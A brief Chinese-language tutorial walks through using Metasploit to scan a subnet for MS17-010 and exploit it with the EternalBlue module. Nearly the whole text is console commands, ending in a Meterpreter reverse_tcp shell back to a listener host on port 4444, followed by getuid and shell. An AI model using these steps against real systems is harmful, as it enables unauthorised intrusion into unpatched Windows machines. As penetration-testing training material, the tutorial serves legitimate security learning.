通过 MS17-010 “永恒之蓝” 来给大家演示一下MSF使用
@ 启动MSF
[msfconsole]
@ 搜索MS17-010 模块 win7
[search ms17_010]
@ 切换到 use scanner/smb/smb/ms17_010
set RHOST 192.168.0.1/24
set THREADS 50
进行扫描win7系统
@ 使用“永恒之蓝”模块
[use exploit/windows/smb/ms17_010_eternalblue]。
@ 显示模块详细信息
[info]
@ 显示受到该漏洞影响的操作系统
[show targets]
根据要渗透测试的目标操作系统类型,可以使用[set target id] 设置。
@ 显示模块参数
[show options]
@ 设置渗透目标地址
[set RHOST 192.168.0.106]
@ 显示可用payload
[show payloads]
可用的payload 有很多,我们一般选用meterpreter 框架下的tcp 反弹连接的payload。
@ 使用payload
[set payload windows/x64/meterpreter/reverse_tcp]
@ 设置payload 参数
[set LHOST 192.168.0.105] 本地地址
默认端口为4444。
@ 渗透攻击
[exploit]
@ 查看权限
[getuid]
@显示meterpreter
shell